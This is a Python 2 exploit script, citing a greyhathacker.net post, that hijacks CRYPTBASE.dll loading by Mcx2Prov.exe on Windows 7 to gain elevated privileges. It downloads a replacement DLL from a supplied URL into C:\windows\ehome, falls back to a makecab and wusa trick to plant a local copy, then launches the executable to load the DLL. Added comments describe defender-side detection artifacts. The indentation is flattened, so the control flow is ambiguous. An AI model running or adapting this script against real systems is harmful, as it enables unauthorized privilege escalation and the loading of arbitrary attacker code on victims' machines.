"""
https://www.greyhathacker.net/?p=796
* Windows 7
Executable:
C:\windows\ehome\Mcx2Prov.exe
Loads:
C:\Windows\ehome\CRYPTBASE.dll
Checks if Mcx2Prov.exe is present in the \windows\ehome\ folder; if True,
continues by checking if the dll file exists. If false, continues by
attempting to download the evil dll file to the \windows\ehome\ folder;
if that fails, we attempt to use makecab and wusa to copy our dll. After
the copy is done, we execute the executable and enjoy the elevated
access.
"""
import os
import sys
import requests
import win32api
import win32con
def mcx2prov_dll_hijack(url):
"""Attempt the Mcx2Prov.exe / CRYPTBASE.dll planting described in the module docstring.

url: location the replacement CRYPTBASE.dll is fetched from with requests.get.
No integrity, signature or size check beyond "more than one byte" is applied
to whatever comes back.

Returns False on every handled failure, falls off the end (None) once
Mcx2Prov.exe has been launched, and calls sys.exit() on the final else branch.
The indentation of this listing was lost in extraction, so the exact nesting
of the try/else clauses below cannot be fully recovered; the comments are a
best-effort reading of the flattened text.

Defender's view: every write targets C:\\windows\\ehome, a directory that is
normally not writable without administrative rights, so the observable
artifacts are the CRYPTBASE.dll write itself, makecab.exe / wusa.exe spawned
through a shell, and Mcx2Prov.exe loading CRYPTBASE.dll from its own folder.
File-integrity monitoring on that folder plus process-creation and image-load
logging cover all three.
"""
# Both paths are hard-coded. os.path.join with a single argument is a no-op
# and "== True" could be a plain truth test; behaviour is unchanged either way.
if (os.path.isfile(os.path.join("c:\windows\ehome\Mcx2Prov.exe")) == True):
# Only proceeds when no CRYPTBASE.dll is already present next to the executable.
if (os.path.isfile(os.path.join("c:\windows\ehome\CRYPTBASE.dll")) == False):
# The whole download / plant / launch sequence sits under one broad except
# (see the bottom of the function), so any failure surfaces only as False.
try:
# No timeout and no verification of the payload; the length test below is
# the only check before the bytes are written into the Windows folder.
download = requests.get(url)
# Anything longer than one byte is accepted as the DLL.
if (len(download.content) > 1):
with open(os.path.join("c:\windows\ehome\CRYPTBASE.dll"),"wb") as dll:
dll.write(download.content)
# Redundant: the with block already closes the file on exit.
dll.close()
# If the write landed, launch the executable. Per the module docstring this is
# the moment Mcx2Prov.exe loads CRYPTBASE.dll from the ehome folder, which is
# the image-load event a defender would look for.
if (os.path.isfile(os.path.join("c:\windows\ehome\CRYPTBASE.dll")) == True):
try:
# SW_SHOW makes the launched window visible. "error" is bound but never used.
win32api.ShellExecute(0,None,"c:\windows\ehome\Mcx2Prov.exe",None,None,win32con.SW_SHOW)
except Exception as error:
return False
else:
# Fallback when the file still is not present after the write: package a
# CRYPTBASE.dll from the current working directory with makecab and have wusa
# extract it into ehome. Both commands are run through a shell via os.popen;
# the returned pipe objects are stored in locals that are not used afterwards.
try:
makecab = os.popen("makecab CRYPTBASE.dll CRYPTBASE.tmp")
except Exception as error:
return False
try:
wusa = os.popen("wusa CRYPTBASE.tmp /extract:c:\windows\ehome")
except Exception as error:
return False
try:
# Python 2 print statement (this file is not Python 3 syntax). os.remove
# returns None, so this line prints "None" after deleting the temp cabinet.
print os.remove("CRYPTBASE.tmp")
except Exception as error:
return False
try:
# Same launch as above, now against the DLL placed by wusa.
win32api.ShellExecute(0,None,"c:\windows\ehome\Mcx2Prov.exe",None,None,win32con.SW_SHOW)
except Exception as error:
return False
else:
# Empty (or one-byte) download: nothing was written, give up.
return False
except Exception as error:
# Catch-all for the entire download / plant / launch sequence.
return False
else:
# sys.exit() terminates the interpreter rather than returning False like every
# other failure path. Which "if" this else belongs to cannot be told from the
# flattened listing; presumably the Mcx2Prov.exe presence check — TODO confirm.
sys.exit()